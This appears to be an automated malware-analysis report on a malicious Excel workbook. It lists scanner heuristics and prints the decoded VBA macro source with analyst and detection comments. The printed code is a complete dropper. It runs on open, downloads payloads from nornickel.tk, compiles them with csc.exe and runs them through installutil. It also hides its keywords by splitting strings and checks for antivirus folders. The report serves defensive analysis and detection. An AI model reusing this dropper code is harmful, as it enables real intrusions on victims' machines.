MALICIOUS
Risk Score: 444
Heuristics: 12
-
VBA macros detected — medium — 8 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus -
WScript.Shell usage — critical — OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")" -
LOLBin reference in VBA — critical — OLE_VBA_LOLBIN: LOLBin reference in VBA. Matched line in script:
oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """ -
Dangerous API name reassembled from split string literals — critical — OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. Matched line in script:
Set fso = CreateObject("Scripting.FileSystemObject") -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set fso = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Sub Workbook_Open() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
appdata = Environ$("APPDATA") -
Reference to Windows Script Host — high — SC_STR_WSCRIPT: Reference to Windows Script Host
-
LOLBin token sequence in document text — high — SE_LOLBIN_RUN_COMMAND: Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Fake invoice / payment lure — low — SE_INVOICE_LURE: Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6790 bytes |

SHA-256: 38dec768b516bd87d25e6771f946b393465d9db75b358eb88b90e9c74867b993
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module "ЭтаКнига" ("ThisWorkbook" in a Russian-localized Excel; VB_Base 00020819 is the
' Workbook class GUID — confirm) hosts all of the code in this sample, including the
' Workbook_Open auto-exec entry point reported by OLE_VBA_WBOPEN. The two sheet modules
' that follow it in the listing carry no code.
' Auto-exec entry point: fires as soon as the workbook is opened with macros enabled.
' Its only action is to call Main (the dropper orchestration below). This is the
' auto-exec + Shell pairing that OLE_VBA_PCODE_AUTOEXEC_EXEC reports.
Sub Workbook_Open()
Main
End Sub
' Makes every sheet in the active workbook visible. Helper used by hidegood/showgood
' to reset sheet state before re-hiding the appropriate sheets.
Sub showall()
For Each Sheet In ActiveWorkbook.Sheets
Sheet.Visible = xlSheetVisible
Next Sheet
End Sub
' Lure state: very-hides every sheet except "Compatibility error" (xlSheetVeryHidden
' sheets do not appear in Excel's Unhide dialog; only VBA can restore them), selects
' that sheet and protects it with a hard-coded password. Not reached from Workbook_Open
' in this listing — presumably used by the author to stage the lure before distribution;
' the runtime path calls showgood instead.
Sub hidegood()
showall
For Each Sheet In ActiveWorkbook.Sheets
If (Sheet.Name <> "Compatibility error") Then
Sheet.Visible = xlSheetVeryHidden
End If
Next Sheet
Sheets("Compatibility error").Select
' Sheet protection with a hard-coded password; applies to the sheet selected above.
ActiveSheet.Protect Password:="11111111", DrawingObjects:=True, Contents:=True, Scenarios:= _
False, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True, AllowInsertingColumns:=True, AllowInsertingRows _
:=True, AllowInsertingHyperlinks:=True, AllowDeletingColumns:=True, _
AllowDeletingRows:=True, AllowSorting:=True, AllowFiltering:=True, _
AllowUsingPivotTables:=True
End Sub
' Post-execution state: makes all sheets visible, then very-hides only the
' "Compatibility error" lure sheet so the victim sees the "real" content after the
' dropper has run. Called at the end of Main.
Sub showgood()
showall
For Each Sheet In ActiveWorkbook.Sheets
If (Sheet.Name = "Compatibility error") Then
Sheet.Visible = xlSheetVeryHidden
End If
Next Sheet
End Sub
' Stage-1 writer: creates strPath (Main passes %APPDATA%\1.txt) and writes a VBScript
' downloader into it. Nothing is executed here; the text is only written to disk and is
' later run by the launcher from dropVB or dropWP.
' ProgIDs are split across concatenated literals ("Adod" + "b.Stream",
' "WScript." + "Sh" + "ell") so that no single literal contains the keyword — the
' evasion described by OLE_VBA_SPLIT_KEYWORD_OBFUSCATION.
' The dropped script fetches two payloads over HTTPS from nornickel.tk into
' %APPDATA%\ps.cs and %APPDATA%\ps.txt.
' Detection: WinHttp.WinHttpRequest.5.1 plus ADODB.Stream SaveToFile inside a
' wscript.exe process spawned by excel.exe; outbound connections to the domain above.
Sub dropDL(strPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(strPath)
' Each WriteLine below emits one line of the dropped VBScript: an HTTPDownload(url, path)
' routine built on WinHttpRequest + ADODB.Stream (type 1 = binary, SaveToFile mode 2 = overwrite).
oFile.WriteLine "Sub HTTPDow" + "nload( myURL, myPath )"
oFile.WriteLine " Dim i, objFile, obj" + "FSO, objHTTP, strFile, strMsg"
oFile.WriteLine " di" + "m bStrm: Set bStrm = create" + "object(""Adod" + "b.Stream"")"
oFile.WriteLine " Set objHTTP = CreateO" + "bject( ""WinHttp.WinHttpRequest.5.1"" )"
oFile.WriteLine " objHTTP.Open ""GET"", myURL, False"
oFile.WriteLine " objHTTP.Send"
oFile.WriteLine " with bStrm"
oFile.WriteLine " .type = 1"
oFile.WriteLine " .open"
oFile.WriteLine " .wri" + "te objHTTP.respon" + "seBody"
oFile.WriteLine " .sav" + "etofile myPath, 2"
oFile.WriteLine " .close"
oFile.WriteLine " end with"
oFile.WriteLine "End Sub"
oFile.WriteLine ""
' Main body of the dropped script: resolve %APPDATA% and download both payloads.
' The download URLs are also split to defeat string scanning.
oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript." + "Sh" + "ell"")"
oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
oFile.WriteLine "HTTPDownload ""https://norni" + "ckel.tk/ps.cs?1"", userdir+""\ps.cs"""
oFile.WriteLine "HTTPDownload ""https://nornick" + "el.tk/prestage.txt?1"", userdir+""\ps.txt"""
oFile.Close
Set fso = Nothing
Set oFile = Nothing
End Sub
' Stage-2 writer: creates strPath (Main passes %APPDATA%\2.txt) with a VBScript that
' (1) compiles the downloaded %APPDATA%\ps.cs with csc.exe, referencing
' System.Management.Automation.dll from the GAC, into %APPDATA%\ps.exe,
' (2) sleeps 2 s, then (3) runs installutil.exe /U against ps.exe with a custom
' /ScriptName argument pointing at %APPDATA%\ps.txt and logging disabled — the LOLBin
' reference reported by OLE_VBA_LOLBIN. Both commands are launched with window style 0
' (hidden) and without waiting for completion.
' Detection: wscript.exe spawning csc.exe and installutil.exe with %APPDATA% paths on
' the command line; new ps.exe under %APPDATA%.
Sub dropEX(strPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(strPath)
oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
' csc.exe command line: compile %APPDATA%\ps.cs into %APPDATA%\ps.exe.
oFile.WriteLine "cmp_cmd=""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe """
oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__" + "31bf3856ad364e35\system.management.automation.dll """
oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/out:%APPDATA%\ps.exe %APPDATA%\ps.cs"""
oFile.WriteLine "oShell.Run cmp_cmd,0,false"
oFile.WriteLine "WScript.Sleep 2000"
' installutil.exe /U command line; the matched line for OLE_VBA_LOLBIN is the first of these.
oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """
oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/logfile= /LogToConsole=false """
oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/ScriptName=%APPDATA%\ps.txt /U %APPDATA%\ps.exe"""
oFile.WriteLine "oShell.Run uninstall_cmd,0,false"
oFile.Close
Set fso = Nothing
Set oFile = Nothing
End Sub
' Launcher variant A (chosen by Main when a Kaspersky, 360 or Trend Micro folder exists):
' writes a .vbs that reads %APPDATA%\1.txt and %APPDATA%\2.txt and evaluates each with
' ExecuteGlobal, so the two staged scripts run inside the same wscript.exe process.
' "executeG" + "lobal" is split to avoid keyword matching. appdata is resolved with
' Environ$ at drop time (the OLE_VBA_ENVIRON finding), so the absolute path is embedded
' in the dropped file. appdata is not declared in this Sub; it is an implicitly created
' variable (no Option Explicit is visible in the listing).
Sub dropVB(strPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(strPath)
appdata = Environ$("APPDATA")
oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\1.txt"").readAll()"
oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\2.txt"").readAll()"
oFile.Close
Set fso = Nothing
Set oFile = Nothing
End Sub
' Launcher variant B (Main's default path): writes a Windows Script File (.wsf) job whose
' two <script> elements load 1.txt and 2.txt as VBScript via relative src attributes, so
' wscript.exe runs them from the directory the .wsf lives in (%APPDATA%). This avoids the
' .vbs extension and ExecuteGlobal used by dropVB; "VBS" + "cript" is the same split-literal
' keyword evasion.
Sub dropWP(strPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(strPath)
oFile.WriteLine "<job>"
oFile.WriteLine "<script language=""VBS" + "cript"" src=""1.txt""/>"
oFile.WriteLine "<script language=""VBScrip" + "t"" src=""2.txt""/>"
oFile.WriteLine "</job>"
oFile.Close
Set fso = Nothing
Set oFile = Nothing
End Sub
' Dropper orchestration, called from Workbook_Open.
' - In VBA, `Dim dep1, dep2, windir, appdata As String` types only appdata as String;
'   dep1, dep2 and windir are Variant.
' - prereq is always True and dep1/dep2 (csc.exe / installutil.exe paths, split into
'   fragments) are computed but never tested — presumably the remains of a dependency
'   check that was never wired in.
' - Writes 1.txt (downloader) and 2.txt (compile + installutil runner) under %APPDATA%,
'   then picks a launcher: if a Kaspersky, 360 or Trend Micro folder exists under
'   Program Files it drops vb.vbs (ExecuteGlobal variant), otherwise wp.wsf, and starts
'   it with Shell "wscript ..." in a normal-focus window. "wsc" + "ript " and the vendor
'   folder names are split to defeat keyword scanning (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION).
' - Finally showgood swaps the lure sheet for the workbook's visible content.
' Detection: excel.exe → wscript.exe with a %APPDATA%\*.vbs or *.wsf argument; creation
' of 1.txt, 2.txt, vb.vbs/wp.wsf, ps.cs, ps.txt and ps.exe under %APPDATA%.
Sub Main()
Dim dep1, dep2, windir, appdata As String
Dim prereq As Boolean
prereq = True
windir = Environ$("WINDIR")
appdata = Environ$("APPDATA") + "\"
' Unused: paths to the two LOLBins the stage-2 script relies on.
dep1 = windir + "\Microsoft.NET\F" + "ramework64\v4.0." + "30319\csc.exe"
dep2 = windir + "\Microsoft.NE" + "T\Framework64\v4.0.3" + "0319\instal" + "lutil.exe"
If (prereq) Then
dropDL (appdata + "1.txt")
dropEX (appdata + "2.txt")
' AV-vendor folder probe selects the launcher format; the directory is only tested for
' existence, nothing in it is touched.
If ((Dir("C:\Program Fil" + "es (x86)\Kas" + "persky Lab", vbDirectory)) <> "") Or ((Dir("C:\Program Files (x86)\360", vbDirectory)) <> "") Or ((Dir("C:\Program Files\Trend Micro", vbDirectory)) <> "") Then
dropVB (appdata + "vb.vbs")
Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus
Else
dropWP (appdata + "wp.wsf")
Shell "wsc" + "ript " + appdata + "wp.wsf", vbNormalFocus
End If
End If
showgood
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet modules "Лист1" and "Sheet4" (VB_Base 00020820 — Worksheet class GUID, confirm)
' contain only attribute headers and no code; all behaviour lives in the workbook module.